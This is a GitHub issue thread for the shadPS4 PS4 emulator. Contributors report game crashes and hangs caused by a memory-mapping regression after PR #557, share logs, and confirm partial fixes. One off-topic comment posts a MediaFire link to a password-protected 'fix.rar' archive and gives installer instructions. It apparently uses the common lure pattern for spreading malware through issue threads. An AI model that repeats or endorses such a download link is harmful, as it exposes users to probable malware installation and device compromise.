### ISSUE TITLE
Regressions from PR #557

### ISSUE THREAD

**Issue by StevenMiller123** [shadps4-emu/shadPS4#601]
After https://github.com/shadps4-emu/shadPS4/pull/557 was merged, some games hang or crash after calling sceKernelGetDirectMemorySize. While some titles improved from https://github.com/shadps4-emu/shadPS4/pull/615, there are still some with issues, which are listed below: 

- Crash™ Team Racing Nitro-Fueled v1.00 (CUSA13795) 
- Persona 5 Strikers v1.00 (CUSA19640)
- SONIC FRONTIERS v1.41 (CUSA28194) - reported by @Fancy2209 

Logs:
[CTR log.txt](https://github.com/user-attachments/files/16791386/CTR.log.txt)
[P5S log.txt](https://github.com/user-attachments/files/16791408/P5S.log.txt)

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by polybiusproxy** [comment]
@StevenMiller123 Can you upload a log for Crash?

Leaving the log for Sakura Wars here.
[sakura_wars.txt](https://github.com/user-attachments/files/16751979/sakura_wars.txt)

**Comment by StevenMiller123** [comment]
I already updated the crash log, it's the file named CTR log.txt

**Comment by polybiusproxy** [comment]
Apologies, I did not see it

**Comment by Fancy2209** [comment]
Sonic Frontiers also regeressed
`Name:SONIC FRONTIERS | Serial:CUSA28194 | Version:01.41 | Size:25.4 GB`
[shad_log.txt](https://github.com/user-attachments/files/16754557/shad_log.txt)

**Comment by StevenMiller123** [comment]
Thanks! I've updated the initial post with these logs.

**Comment by ghost** [comment]
[shad_log.txt](https://github.com/user-attachments/files/16754648/shad_log.txt)

Project Diva X
1.02

**Comment by jnackmclain** [comment]
Rock Band 4 Latest also crashes after this PR
[shad_log.txt](https://github.com/user-attachments/files/16755077/shad_log.txt)

Does not crash on this branch
https://github.com/LlysiX/shadPS4/tree/rb4-new

**Comment by StevenMiller123** [comment]
@jnackmclain Please test on the latest main branch, not on a custom branch. The log you sent is from some rb4 branch, and I cannot verify how that branch differs from the current main.

**Comment by jnackmclain** [comment]
@StevenMiller123 Apologies, I thought that log was from main.
The log below was generated from latest main action at the time of writing.
The rb4 branch url i gave was reference as it is still booting rb4 where main is not
[shad_log.txt](https://github.com/user-attachments/files/16761800/shad_log.txt)

**Comment by squidbus** [comment]
https://github.com/shadps4-emu/shadPS4/pull/615 should fix any games hitting `Unable to find free direct memory area`.

**Comment by squidbus** [comment]
Some fixes have been merged, if anyone testing here could re-test and update on what games are still regressed from before.

**Comment by StevenMiller123** [comment]
@Fancy2209 Could you retest Sonic Frontiers on the latest main build of shadPS4? Most games with this regression had their error change after https://github.com/shadps4-emu/shadPS4/pull/615 was merged. 

Additionally, @squidbus, could you provide confirmation that the issue with Sakura Wars was fixed? I figure that https://github.com/shadps4-emu/shadPS4/pull/615 was intended to fix it, but I need confirmation to make sure the information on this issue is accurate.

**Comment by squidbus** [comment]
> could you provide confirmation that the issue with Sakura Wars was fixed?

Yes it's fixed.

**Comment by StevenMiller123** [comment]
@Jomanakk By updating my dump of Project Diva X, I was able to verify the issue you reported and confirm it was fixed by https://github.com/shadps4-emu/shadPS4/pull/615. If you still encounter the regression on the latest main, please let me know.

**Comment by StevenMiller123** [comment]
@polybiusproxy Any updates on fixing the remaining errors here? I recall you mentioning on Discord that you were planning to fix  these regressions after your break.

**Comment by Fancy2209** [comment]
Sonic Frontiers is still regressed
```
[Debug] <Critical> memory.cpp:operator():447: Assertion Failed!
Mapping cannot fit inside free region: size = 0x52000000
```

**Comment by gandalfthewhite19890404** [comment]
Diablo II Resurrected - CUSA28305

```
[Debug] <Critical> memory.cpp:operator():568: Assertion Failed!
Mapping cannot fit inside free region: size = 0x96800000
```

**Comment by Hermiten** [comment]
Can you please update theses games on the compatibility list to see if there is still a regression ?
@gandalfthewhite19890404 @StevenMiller123 @Fancy2209 

Thanks you

**Comment by StevenMiller123** [comment]
@Hermiten I've already updated my reports. The games I own that are still regressed are:

- Call of Duty®: Advanced Warfare
- Crash™ Team Racing Nitro-Fueled
- Persona 5 Strikers

I still need to add reports for these to that newer aggregate issue though.

**Comment by Hermiten** [comment]
Perfect, I did check for the other one but not you, sorry 😅

**Comment by StevenMiller123** [comment]
Looks like the Persona 5 Strikers is still hanging as a result of this regression. Since it isn't crashing, it doesn't belong in that aggregate issue. I've posted the other two games in there though.

**Comment by Hermiten** [comment]
@polybiusproxy Hey sorry for the ping, but it still actual. If you have an idea about that ?
Thanks you

**Comment by Hermiten** [comment]
We can now folloy this one here:
https://github.com/shadps4-emu/shadPS4/issues/825
